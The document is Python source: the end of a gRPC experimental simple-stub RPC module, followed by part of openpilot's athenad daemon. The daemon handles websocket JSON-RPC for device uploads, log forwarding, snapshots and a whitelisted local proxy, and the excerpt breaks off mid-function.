                        self._mapping) >= _MAXIMUM_CHANNELS:
                    self._condition.notify()
                return channel

    def _test_only_channel_count(self) -> int:
        with self._lock:
            return len(self._mapping)
@experimental_api
def unary_unary(
        request: RequestType,
        target: str,
        method: str,
        request_serializer: Optional[Callable[[Any], bytes]] = None,
        response_deserializer: Optional[Callable[[bytes], Any]] = None,
        options: Sequence[Tuple[AnyStr, AnyStr]] = (),
        channel_credentials: Optional[grpc.ChannelCredentials] = None,
        insecure: bool = False,
        call_credentials: Optional[grpc.CallCredentials] = None,
        compression: Optional[grpc.Compression] = None,
        wait_for_ready: Optional[bool] = None,
        timeout: Optional[float] = _DEFAULT_TIMEOUT,
        metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
    """Invokes a unary-unary RPC without an explicitly specified channel.

    THIS IS AN EXPERIMENTAL API.

    This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.

    The default eviction period is 10 minutes. One may set the environment
    variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.

    The default maximum number of channels is 256. One may set the
    environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
    this.

    Args:
      request: The request value for the RPC.
      target: The server address.
      method: The name of the RPC method.
      request_serializer: Optional :term:`serializer` for serializing the request
        message. Request goes unserialized in case None is passed.
      response_deserializer: Optional :term:`deserializer` for deserializing the response
        message. Response goes undeserialized in case None is passed.
      options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
        runtime) to configure the channel.
      channel_credentials: A credential applied to the whole channel, e.g. the
        return value of grpc.ssl_channel_credentials() or
        grpc.insecure_channel_credentials().
      insecure: If True, specifies channel_credentials as
        :term:`grpc.insecure_channel_credentials()`. This option is mutually
        exclusive with the `channel_credentials` option.
      call_credentials: A call credential applied to each call individually,
        e.g. the output of grpc.metadata_call_credentials() or
        grpc.access_token_call_credentials().
      compression: An optional value indicating the compression method to be
        used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
      wait_for_ready: An optional flag indicating whether the RPC should fail
        immediately if the connection is not ready at the time the RPC is
        invoked, or if it should wait until the connection to the server
        becomes ready. When using this option, the user will likely also want
        to set a timeout. Defaults to True.
      timeout: An optional duration of time in seconds to allow for the RPC,
        after which an exception will be raised. If timeout is unspecified,
        defaults to a timeout controlled by the
        GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
        unset, defaults to 60 seconds. Supply a value of None to indicate that
        no timeout should be enforced.
      metadata: Optional metadata to send to the server.

    Returns:
      The response to the RPC.
    """
    channel = ChannelCache.get().get_channel(target, options,
                                             channel_credentials, insecure,
                                             compression)
    multicallable = channel.unary_unary(method, request_serializer,
                                        response_deserializer)
    # Per the docstring: wait_for_ready defaults to True when unspecified.
    wait_for_ready = wait_for_ready if wait_for_ready is not None else True
    return multicallable(request,
                         metadata=metadata,
                         wait_for_ready=wait_for_ready,
                         credentials=call_credentials,
                         timeout=timeout)
@experimental_api
def unary_stream(
        request: RequestType,
        target: str,
        method: str,
        request_serializer: Optional[Callable[[Any], bytes]] = None,
        response_deserializer: Optional[Callable[[bytes], Any]] = None,
        options: Sequence[Tuple[AnyStr, AnyStr]] = (),
        channel_credentials: Optional[grpc.ChannelCredentials] = None,
        insecure: bool = False,
        call_credentials: Optional[grpc.CallCredentials] = None,
        compression: Optional[grpc.Compression] = None,
        wait_for_ready: Optional[bool] = None,
        timeout: Optional[float] = _DEFAULT_TIMEOUT,
        metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
    """Invokes a unary-stream RPC without an explicitly specified channel.

    THIS IS AN EXPERIMENTAL API.

    This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.

    The default eviction period is 10 minutes. One may set the environment
    variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.

    The default maximum number of channels is 256. One may set the
    environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
    this.

    Args:
      request: The request value for the RPC.
      target: The server address.
      method: The name of the RPC method.
      request_serializer: Optional :term:`serializer` for serializing the request
        message. Request goes unserialized in case None is passed.
      response_deserializer: Optional :term:`deserializer` for deserializing the response
        message. Response goes undeserialized in case None is passed.
      options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
        runtime) to configure the channel.
      channel_credentials: A credential applied to the whole channel, e.g. the
        return value of grpc.ssl_channel_credentials().
      insecure: If True, specifies channel_credentials as
        :term:`grpc.insecure_channel_credentials()`. This option is mutually
        exclusive with the `channel_credentials` option.
      call_credentials: A call credential applied to each call individually,
        e.g. the output of grpc.metadata_call_credentials() or
        grpc.access_token_call_credentials().
      compression: An optional value indicating the compression method to be
        used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
      wait_for_ready: An optional flag indicating whether the RPC should fail
        immediately if the connection is not ready at the time the RPC is
        invoked, or if it should wait until the connection to the server
        becomes ready. When using this option, the user will likely also want
        to set a timeout. Defaults to True.
      timeout: An optional duration of time in seconds to allow for the RPC,
        after which an exception will be raised. If timeout is unspecified,
        defaults to a timeout controlled by the
        GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
        unset, defaults to 60 seconds. Supply a value of None to indicate that
        no timeout should be enforced.
      metadata: Optional metadata to send to the server.

    Returns:
      An iterator of responses.
    """
    channel = ChannelCache.get().get_channel(target, options,
                                             channel_credentials, insecure,
                                             compression)
    multicallable = channel.unary_stream(method, request_serializer,
                                         response_deserializer)
    # Per the docstring: wait_for_ready defaults to True when unspecified.
    wait_for_ready = wait_for_ready if wait_for_ready is not None else True
    return multicallable(request,
                         metadata=metadata,
                         wait_for_ready=wait_for_ready,
                         credentials=call_credentials,
                         timeout=timeout)
@experimental_api
def stream_unary(
        request_iterator: Iterator[RequestType],
        target: str,
        method: str,
        request_serializer: Optional[Callable[[Any], bytes]] = None,
        response_deserializer: Optional[Callable[[bytes], Any]] = None,
        options: Sequence[Tuple[AnyStr, AnyStr]] = (),
        channel_credentials: Optional[grpc.ChannelCredentials] = None,
        insecure: bool = False,
        call_credentials: Optional[grpc.CallCredentials] = None,
        compression: Optional[grpc.Compression] = None,
        wait_for_ready: Optional[bool] = None,
        timeout: Optional[float] = _DEFAULT_TIMEOUT,
        metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
    """Invokes a stream-unary RPC without an explicitly specified channel.

    THIS IS AN EXPERIMENTAL API.

    This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.

    The default eviction period is 10 minutes. One may set the environment
    variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.

    The default maximum number of channels is 256. One may set the
    environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
    this.

    Args:
      request_iterator: An iterator that yields request values for the RPC.
      target: The server address.
      method: The name of the RPC method.
      request_serializer: Optional :term:`serializer` for serializing the request
        message. Request goes unserialized in case None is passed.
      response_deserializer: Optional :term:`deserializer` for deserializing the response
        message. Response goes undeserialized in case None is passed.
      options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
        runtime) to configure the channel.
      channel_credentials: A credential applied to the whole channel, e.g. the
        return value of grpc.ssl_channel_credentials().
      call_credentials: A call credential applied to each call individually,
        e.g. the output of grpc.metadata_call_credentials() or
        grpc.access_token_call_credentials().
      insecure: If True, specifies channel_credentials as
        :term:`grpc.insecure_channel_credentials()`. This option is mutually
        exclusive with the `channel_credentials` option.
      compression: An optional value indicating the compression method to be
        used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
      wait_for_ready: An optional flag indicating whether the RPC should fail
        immediately if the connection is not ready at the time the RPC is
        invoked, or if it should wait until the connection to the server
        becomes ready. When using this option, the user will likely also want
        to set a timeout. Defaults to True.
      timeout: An optional duration of time in seconds to allow for the RPC,
        after which an exception will be raised. If timeout is unspecified,
        defaults to a timeout controlled by the
        GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
        unset, defaults to 60 seconds. Supply a value of None to indicate that
        no timeout should be enforced.
      metadata: Optional metadata to send to the server.

    Returns:
      The response to the RPC.
    """
    channel = ChannelCache.get().get_channel(target, options,
                                             channel_credentials, insecure,
                                             compression)
    multicallable = channel.stream_unary(method, request_serializer,
                                         response_deserializer)
    # Per the docstring: wait_for_ready defaults to True when unspecified.
    wait_for_ready = wait_for_ready if wait_for_ready is not None else True
    return multicallable(request_iterator,
                         metadata=metadata,
                         wait_for_ready=wait_for_ready,
                         credentials=call_credentials,
                         timeout=timeout)
@experimental_api
def stream_stream(
        request_iterator: Iterator[RequestType],
        target: str,
        method: str,
        request_serializer: Optional[Callable[[Any], bytes]] = None,
        response_deserializer: Optional[Callable[[bytes], Any]] = None,
        options: Sequence[Tuple[AnyStr, AnyStr]] = (),
        channel_credentials: Optional[grpc.ChannelCredentials] = None,
        insecure: bool = False,
        call_credentials: Optional[grpc.CallCredentials] = None,
        compression: Optional[grpc.Compression] = None,
        wait_for_ready: Optional[bool] = None,
        timeout: Optional[float] = _DEFAULT_TIMEOUT,
        metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
    """Invokes a stream-stream RPC without an explicitly specified channel.

    THIS IS AN EXPERIMENTAL API.

    This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.

    The default eviction period is 10 minutes. One may set the environment
    variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.

    The default maximum number of channels is 256. One may set the
    environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
    this.

    Args:
      request_iterator: An iterator that yields request values for the RPC.
      target: The server address.
      method: The name of the RPC method.
      request_serializer: Optional :term:`serializer` for serializing the request
        message. Request goes unserialized in case None is passed.
      response_deserializer: Optional :term:`deserializer` for deserializing the response
        message. Response goes undeserialized in case None is passed.
      options: An optional list of key-value pairs (:term:`channel_arguments` in gRPC Core
        runtime) to configure the channel.
      channel_credentials: A credential applied to the whole channel, e.g. the
        return value of grpc.ssl_channel_credentials().
      call_credentials: A call credential applied to each call individually,
        e.g. the output of grpc.metadata_call_credentials() or
        grpc.access_token_call_credentials().
      insecure: If True, specifies channel_credentials as
        :term:`grpc.insecure_channel_credentials()`. This option is mutually
        exclusive with the `channel_credentials` option.
      compression: An optional value indicating the compression method to be
        used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
      wait_for_ready: An optional flag indicating whether the RPC should fail
        immediately if the connection is not ready at the time the RPC is
        invoked, or if it should wait until the connection to the server
        becomes ready. When using this option, the user will likely also want
        to set a timeout. Defaults to True.
      timeout: An optional duration of time in seconds to allow for the RPC,
        after which an exception will be raised. If timeout is unspecified,
        defaults to a timeout controlled by the
        GRPC_PYTHON_DEFAULT_TIMEOUT_SECONDS environment variable. If that is
        unset, defaults to 60 seconds. Supply a value of None to indicate that
        no timeout should be enforced.
      metadata: Optional metadata to send to the server.

    Returns:
      An iterator of responses.
    """
    channel = ChannelCache.get().get_channel(target, options,
                                             channel_credentials, insecure,
                                             compression)
    multicallable = channel.stream_stream(method, request_serializer,
                                          response_deserializer)
    # Per the docstring: wait_for_ready defaults to True when unspecified.
    wait_for_ready = wait_for_ready if wait_for_ready is not None else True
    return multicallable(request_iterator,
                         metadata=metadata,
                         wait_for_ready=wait_for_ready,
                         credentials=call_credentials,
                         timeout=timeout)
|
athenad.py | #!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
import tempfile
from collections import namedtuple
from functools import partial
from typing import Any
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
from selfdrive.statsd import STATS_DIR
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}  # only these local ports may be proxied

LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10  # seconds
MAX_RETRY_COUNT = 30  # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096

dispatcher["echo"] = lambda s: s
# Queues shared between the websocket pump threads and the worker threads.
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
# An upload job; the last three fields (retry_count, current, progress)
# default to (0, False, 0).
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))

# Upload-thread ident -> its in-flight UploadItem (or None when idle).
# The previous untyped `cur_upload_items = {}` line was dead code: it was
# immediately overwritten by this annotated assignment.
cur_upload_items: Dict[int, Any] = {}
class UploadQueueCache():
  """Persists the upload queue across restarts via the AthenadUploadQueue param."""
  params = Params()

  @staticmethod
  def initialize(upload_queue):
    """Refill upload_queue from the cached JSON blob, if one exists."""
    try:
      cached = UploadQueueCache.params.get("AthenadUploadQueue")
      if cached is not None:
        for entry in json.loads(cached):
          upload_queue.put(UploadItem(**entry))
    except Exception:
      cloudlog.exception("athena.UploadQueueCache.initialize.exception")

  @staticmethod
  def cache(upload_queue):
    """Snapshot the queue (minus cancelled items) back into the param store."""
    try:
      pending = [item._asdict() for item in upload_queue.queue if item.id not in cancelled_uploads]
      UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(pending))
    except Exception:
      cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
  """Run the websocket pump, upload, log, stat and RPC worker threads.

  Blocks until a worker signals end_event (or the process is interrupted),
  then joins every thread before returning.
  """
  end_event = threading.Event()

  threads = [
    threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
    threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
    threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
    threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
    threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
  ]
  threads.extend(
    threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
    for x in range(HANDLER_THREADS)
  )

  for t in threads:
    t.start()
  try:
    while not end_event.is_set():
      time.sleep(0.1)
  except (KeyboardInterrupt, SystemExit):
    end_event.set()
    raise
  finally:
    for t in threads:
      cloudlog.debug(f"athena.joining {t.name}")
      t.join()
def jsonrpc_handler(end_event):
  """Pump recv_queue until end_event is set.

  JSON-RPC requests are dispatched and their responses queued for sending;
  responses to our own outbound requests are routed to log_recv_queue.
  """
  dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
  while not end_event.is_set():
    try:
      msg = recv_queue.get(timeout=1)
      if "method" in msg:
        cloudlog.debug(f"athena.jsonrpc_handler.call_method {msg}")
        reply = JSONRPCResponseManager.handle(msg, dispatcher)
        send_queue.put_nowait(reply.json)
      elif ("result" in msg or "error" in msg) and "id" in msg:
        log_recv_queue.put_nowait(msg)
      else:
        raise Exception("not a valid request or response")
    except queue.Empty:
      pass
    except Exception as e:
      cloudlog.exception("athena jsonrpc handler failed")
      send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event) -> None:
  """Re-queue the upload currently held by thread `tid` with an incremented
  retry count, then wait up to RETRY_DELAY seconds (aborting early if
  end_event fires). Gives up silently once MAX_RETRY_COUNT is reached."""
  item = cur_upload_items[tid]
  if item.retry_count < MAX_RETRY_COUNT:
    requeued = item._replace(
      retry_count=item.retry_count + 1,
      progress=0,
      current=False,
    )
    upload_queue.put_nowait(requeued)
    UploadQueueCache.cache(upload_queue)

    cur_upload_items[tid] = None

    for _ in range(RETRY_DELAY):
      time.sleep(1)
      if end_event.is_set():
        break
def upload_handler(end_event: threading.Event) -> None:
  """Worker loop: take items off upload_queue and PUT them to their URLs.

  Skips cancelled items, reports progress via the item's `progress` field,
  and retries (bounded by MAX_RETRY_COUNT) on server errors or network
  failures. Status codes 200/201/403/412 are treated as terminal.
  """
  tid = threading.get_ident()

  while not end_event.is_set():
    cur_upload_items[tid] = None

    try:
      cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)

      if cur_upload_items[tid].id in cancelled_uploads:
        cancelled_uploads.remove(cur_upload_items[tid].id)
        continue

      try:
        def cb(sz, cur):
          cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)

        # BUG FIX: _do_upload was invoked twice back-to-back, uploading every
        # file twice; a single call is made and its response inspected.
        response = _do_upload(cur_upload_items[tid], cb)
        if response.status_code not in (200, 201, 403, 412):
          cloudlog.warning(f"athena.upload_handler.retry {response.status_code} {cur_upload_items[tid]}")
          retry_upload(tid, end_event)
        UploadQueueCache.cache(upload_queue)
      except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
        cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
        # BUG FIX: the retry logic was inlined here *and* retry_upload() was
        # called afterwards, enqueueing the item twice per failure and
        # double-incrementing retry_count; delegate to retry_upload() once.
        retry_upload(tid, end_event)

    except queue.Empty:
      pass
    except Exception:
      cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
  """PUT the file at upload_item.path to upload_item.url.

  When `callback` is given, the file object is wrapped in a CallbackReader
  so upload progress can be reported. Returns the requests.Response.
  """
  with open(upload_item.path, "rb") as f:
    size = os.fstat(f.fileno()).st_size

    stream = CallbackReader(f, callback, size) if callback else f

    headers = dict(upload_item.headers)
    headers['Content-Length'] = str(size)
    return requests.put(upload_item.url, data=stream, headers=headers, timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
  """Return a single message from `service` as a dict.

  Raises on an unknown service name, and TimeoutError if no message
  arrives within `timeout` milliseconds.
  """
  if service is None or service not in service_list:
    raise Exception("invalid service")

  sock = messaging.sub_sock(service, timeout=timeout)
  msg = messaging.recv_one(sock)

  if msg is None:
    raise TimeoutError

  return msg.to_dict()
@dispatcher.add_method
def getVersion():
  """Report the running openpilot version, git remote, branch and commit."""
  info = {}
  info["version"] = get_version()
  info["remote"] = get_origin()
  info["branch"] = get_short_branch()
  info["commit"] = get_commit()
  return info
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
  """Persist the navigation destination in the NavDestination param."""
  Params().put("NavDestination", json.dumps({
    "latitude": latitude,
    "longitude": longitude,
    "place_name": place_name,
    "place_details": place_details,
  }))
  return {"success": 1}
def scan_dir(path, prefix):
  """Recursively collect files under `path` whose ROOT-relative path starts
  with `prefix`.

  Unlike glob and friends, only directories compatible with the prefix are
  descended into, so the whole tree is not traversed.
  """
  found = []
  with os.scandir(path) as entries:
    for entry in entries:
      rel_path = os.path.relpath(entry.path, ROOT)
      if entry.is_dir(follow_symlinks=False):
        # add trailing slash so directory prefixes compare correctly
        rel_path = os.path.join(rel_path, '')
        # descend when the prefix names this dir (partially) or something inside it:
        # - partial dir name: current dir starts with prefix
        # - partial file name: prefix starts with the dir name
        if rel_path.startswith(prefix) or prefix.startswith(rel_path):
          found += scan_dir(entry.path, prefix)
      elif rel_path.startswith(prefix):
        found.append(rel_path)
  return found
@dispatcher.add_method
def listDataDirectory(prefix=''):
  # List files under ROOT whose ROOT-relative path starts with `prefix`.
  return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
  """Reboot the device, refusing while onroad (deviceState.started)."""
  sock = messaging.sub_sock("deviceState", timeout=1000)
  state = messaging.recv_one(sock)
  if state is None or state.deviceState.started:
    raise Exception("Reboot unavailable")

  def do_reboot():
    # short delay so the RPC response can be delivered first
    time.sleep(2)
    HARDWARE.reboot()

  threading.Thread(target=do_reboot).start()

  return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
  # Single-file convenience wrapper around uploadFilesToUrls.
  return uploadFilesToUrls([[fn, url, headers]])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
  """Queue files (paths relative to ROOT) for upload.

  `files_data` is a list of (fn, url, headers) triples. Paths that are
  empty, absolute, contain '..', or do not exist are reported under
  "failed" instead of being enqueued.
  """
  items = []
  failed = []
  for fn, url, headers in files_data:
    # reject empty, absolute, or directory-traversal paths
    if len(fn) == 0 or fn[0] == '/' or '..' in fn:
      failed.append(fn)
      continue
    path = os.path.join(ROOT, fn)
    if not os.path.exists(path):
      failed.append(fn)
      continue

    item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
    # id is a content hash of the item itself, assigned after construction
    item = item._replace(id=hashlib.sha1(str(item).encode()).hexdigest())
    upload_queue.put_nowait(item)
    items.append(item._asdict())

  UploadQueueCache.cache(upload_queue)

  resp = {"enqueued": len(items), "items": items}
  if failed:
    resp["failed"] = failed
  return resp
@dispatcher.add_method
def listUploadQueue():
  """List queued and in-flight uploads, excluding cancelled ones."""
  pending = list(upload_queue.queue) + list(cur_upload_items.values())
  return [item._asdict() for item in pending
          if item is not None and item.id not in cancelled_uploads]
@dispatcher.add_method
def cancelUpload(upload_id):
  """Mark queued upload(s) as cancelled; returns 404 when none match.

  `upload_id` may be a single id or a list of ids.
  """
  ids = upload_id if isinstance(upload_id, list) else [upload_id]

  queued_ids = {item.id for item in list(upload_queue.queue)}
  matched = queued_ids.intersection(ids)
  if not matched:
    return 404

  cancelled_uploads.update(matched)
  return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
  # Acknowledge the prime-activation notification; no local action is taken.
  return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
  """Bridge a remote websocket to a whitelisted local TCP port.

  Starts one thread pumping ws -> local socket (ws_proxy_recv) and one
  pumping local socket -> ws (ws_proxy_send), then returns immediately.
  Raises if `local_port` is not in LOCAL_PORT_WHITELIST.
  """
  try:
    if local_port not in LOCAL_PORT_WHITELIST:
      raise Exception("Requested local port not whitelisted")
    cloudlog.debug("athena.startLocalProxy.starting")
    dongle_id = Params().get("DongleId").decode('utf8')
    identity_token = Api(dongle_id).get_token()
    ws = create_connection(remote_ws_uri,
                           cookie="jwt=" + identity_token,
                           enable_multithread=True)
    # socketpair lets ws_proxy_recv signal ws_proxy_send to shut down
    ssock, csock = socket.socketpair()
    local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_sock.connect(('127.0.0.1', local_port))
    local_sock.setblocking(0)  # non-blocking; ws_proxy_send uses select()
    proxy_end_event = threading.Event()
    threads = [
      threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
      threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
    ]
    for thread in threads:
      thread.start()
    cloudlog.debug("athena.startLocalProxy.started")
    return {"success": 1}
  except Exception as e:
    cloudlog.exception("athenad.startLocalProxy.exception")
    raise e
@dispatcher.add_method
def getPublicKey():
  """Return the device's RSA public key, or None if it does not exist."""
  key_path = PERSIST + '/comma/id_rsa.pub'
  if not os.path.isfile(key_path):
    return None

  with open(key_path) as f:
    return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
  # Stored GitHub SSH keys; empty string when the param is unset.
  return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
  # SIM card details as reported by the hardware abstraction layer.
  return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
  # Current network connection type (wifi/cell/...) from the HAL.
  return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
  # Visible networks as reported by the hardware abstraction layer.
  return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
  """Take front/back camera snapshots, returned base64-JPEG encoded.

  Raises when snapshots are unavailable (camerad running).
  """
  from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
  frames = snapshot()
  if frames is None:
    raise Exception("not available while camerad is started")

  def b64jpeg(frame):
    if frame is None:
      return None
    buf = io.BytesIO()
    jpeg_write(buf, frame)
    return base64.b64encode(buf.getvalue()).decode("utf-8")

  return {'jpegBack': b64jpeg(frames[0]),
          'jpegFront': b64jpeg(frames[1])}
def get_logs_to_send_sorted():
  """Return swaglog filenames due for (re)sending, sorted, excluding the
  newest (still-active) file.

  A log is due when it has never been marked sent (via the LOG_ATTR_NAME
  xattr) or when its last send attempt was over an hour ago.
  """
  # TODO: scan once then use inotify to detect file creation/deletion
  now = int(time.time())
  due = []
  for name in os.listdir(SWAGLOG_DIR):
    path = os.path.join(SWAGLOG_DIR, name)
    try:
      sent_at = int.from_bytes(getxattr(path, LOG_ATTR_NAME), sys.byteorder)
    except (ValueError, TypeError):
      sent_at = 0  # xattr missing or unreadable -> treat as never sent
    # assume send failed and we lost the response if sent more than one hour ago
    if not sent_at or now - sent_at > 3600:
      due.append(name)
  # excluding most recent (active) log file
  return sorted(due)[:-1]
def log_handler(end_event):
  """Forward swaglog files to the server one at a time until end_event.

  Rescans the log directory at most every 10 seconds, sends the newest
  pending file as a `forwardLogs` JSON-RPC request, and marks a file as
  sent (via xattr) once a success response with the matching id arrives.
  Disabled on PC builds.
  """
  if PC:
    return
  log_files = []
  last_scan = 0
  while not end_event.is_set():
    try:
      curr_scan = sec_since_boot()
      if curr_scan - last_scan > 10:
        log_files = get_logs_to_send_sorted()
        last_scan = curr_scan
      # send one log
      curr_log = None
      if len(log_files) > 0:
        log_entry = log_files.pop()  # newest log file
        cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
        try:
          curr_time = int(time.time())
          log_path = os.path.join(SWAGLOG_DIR, log_entry)
          # record the attempt time so a lost response is retried after an hour
          setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
          with open(log_path) as f:
            jsonrpc = {
              "method": "forwardLogs",
              "params": {
                "logs": f.read()
              },
              "jsonrpc": "2.0",
              "id": log_entry
            }
          low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
          curr_log = log_entry
        except OSError:
          pass  # file could be deleted by log rotation
      # wait for response up to ~100 seconds
      # always read queue at least once to process any old responses that arrive
      for _ in range(100):
        if end_event.is_set():
          break
        try:
          log_resp = json.loads(log_recv_queue.get(timeout=1))
          log_entry = log_resp.get("id")
          log_success = "result" in log_resp and log_resp["result"].get("success")
          cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
          if log_entry and log_success:
            log_path = os.path.join(SWAGLOG_DIR, log_entry)
            try:
              # mark as permanently sent so it is never rescanned
              setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
            except OSError:
              pass  # file could be deleted by log rotation
          if curr_log == log_entry:
            break
        except queue.Empty:
          if curr_log is None:
            break
    except Exception:
      cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
  """Periodically forward one stats file to the server and delete it.

  Scans STATS_DIR at most every 10 seconds; files with the tempfile
  prefix (still being written) are skipped.
  """
  # BUG FIX: last_scan was reset to 0 inside the loop, so the 10-second
  # rate limit never applied and the stats dir was scanned every 100 ms.
  last_scan = 0
  while not end_event.is_set():
    curr_scan = sec_since_boot()
    try:
      if curr_scan - last_scan > 10:
        stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
        if len(stat_filenames) > 0:
          stat_path = os.path.join(STATS_DIR, stat_filenames[0])
          with open(stat_path) as f:
            jsonrpc = {
              "method": "storeStats",
              "params": {
                "stats": f.read()
              },
              "jsonrpc": "2.0",
              "id": stat_filenames[0]
            }
          low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
          os.remove(stat_path)
        last_scan = curr_scan
    except Exception:
      cloudlog.exception("athena.stat_handler.exception")
    time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
  """Pump bytes from the remote websocket into the local socket.

  Runs until either end event fires or the websocket errors; on exit both
  sockets are closed (closing ssock wakes ws_proxy_send via its signal
  socket) and end_event is set.
  """
  while not (end_event.is_set() or global_end_event.is_set()):
    try:
      local_sock.sendall(ws.recv())
    except WebSocketTimeoutException:
      pass
    except Exception:
      cloudlog.exception("athenad.ws_proxy_recv.exception")
      break

  cloudlog.debug("athena.ws_proxy_recv closing sockets")
  ssock.close()
  local_sock.close()
  cloudlog.debug("athena.ws_proxy_recv done closing sockets")

  end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
  """Pump bytes from the local socket to the websocket as binary frames.

  `signal_sock` becoming readable means ws_proxy_recv has shut down; an
  empty read means the local socket died — either way the loop ends and
  end_event is set.
  """
  while not end_event.is_set():
    try:
      readable, _, _ = select.select((local_sock, signal_sock), (), ())
      if not readable:
        continue
      if readable[0].fileno() == signal_sock.fileno():
        # got end signal from ws_proxy_recv
        end_event.set()
        break
